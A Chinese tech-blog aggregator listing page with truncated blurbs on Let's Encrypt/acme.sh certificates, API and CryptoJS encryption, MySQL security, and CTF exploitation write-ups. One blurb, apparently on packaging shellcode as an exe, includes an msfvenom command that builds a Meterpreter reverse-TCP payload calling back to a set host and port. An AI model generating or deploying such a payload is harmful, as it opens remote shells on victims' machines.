acme.sh 快速实现 https 证书颁发与自动续期 借助acem.sh来迅速实现 let's encrypt 的泛域名 ssl 证书颁发与续期,基本上五分钟就可以解决战斗 本文主要内容来自 acme.sh 的官方 wiki,一切以官方说明为准: acme wiki I. 安装步骤 1. 登录服 ...
分类:
Web程序 时间:
2020-08-10 10:51:51
阅读次数:
83
框架介绍monkey-api-encrypt是我之前写的一个API加密的框架,主要是将加密/解密的逻辑交给框架实现,等数据到达Controller后自动解密了,让开发人员不需要关注数据的加解密操作。Github:https://github.com/yinjihuan/monkey-api-encrypt[1]目前,502个关注,今天能到520么?新功能介绍Bug修复当项目的context-pat
数据库的安全性是指保护数据库以防止不合法的使用而造成数据泄露,更改或破坏,所以安全性对于任何一个DBMS来说都是至关重要的. 身份验证,数据库用户权限确认 用户账号管理 root用户 mysql-> select user from mysql.user; 使用create user语句创建MySQ ...
分类:
其他好文 时间:
2020-07-30 21:48:39
阅读次数:
94
Let's Encrypt是一个证书颁发机构(CA),它提供了免费TLS / SSL证书,从而可以在Web服务器上启用加密的HTTPS。 使用“让我们加密SSL”证书的主要优点: 它是免费的 -拥有域的任何人都可以以零成本获得该域的受信任证书。 它是自动的 –证书的整个注册过程会在服务器的本机安装或 ...
分类:
其他好文 时间:
2020-07-28 22:12:50
阅读次数:
85
1.关于let's encrypt和acme.sh的简介 1.1 let's encrypt Let's Encrypt是一个于2015年三季度推出的数字证书认证机构,旨在以自动化流程消除手动创建和安装证书的复杂流程,并推广使万维网服务器的加密连接无所不在,为安全网站提供免费的SSL/TLS证书。 ...
分类:
Web程序 时间:
2020-07-24 13:26:37
阅读次数:
285
0x01 检查文件,64位 检查开启的保护情况 开启了NX保护 0x02 IDA静态分析 在主函数这里并没有常见的gets栈溢出,尝试再这里面的子函数找找,发现了encrypt函数,进去查看 发现这个变量x的自增是由空间大小限制的,猜测这里会出现栈溢出漏洞,写出exp尝试溢出 0x03 exp: f ...
分类:
其他好文 时间:
2020-07-18 22:51:32
阅读次数:
121
0x01 进入页面如下 提示我们寻找secret,再加上题目的提示,猜测这里有secret页面,我们尝试访问,结果如下 根据它这个话的意思,是让我们传参,然后它会给你加密,我们试一下 发现输入的1变成了d,我们尝试增加输入参数的长度,然后就出现了下图的结果 报错了,直接源码泄露,然后我们看一下标记处 ...
分类:
其他好文 时间:
2020-07-18 15:52:28
阅读次数:
82
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c 将payload给copy下来 ...
分类:
编程语言 时间:
2020-07-11 09:26:03
阅读次数:
85
###1 import CryptoJS from 'crypto-js' export const encrypt = (word) => { var key = CryptoJS.enc.Utf8.parse("46cc793c53dc451b"); var srcs = CryptoJS.en ...
分类:
Web程序 时间:
2020-07-10 20:52:08
阅读次数:
66
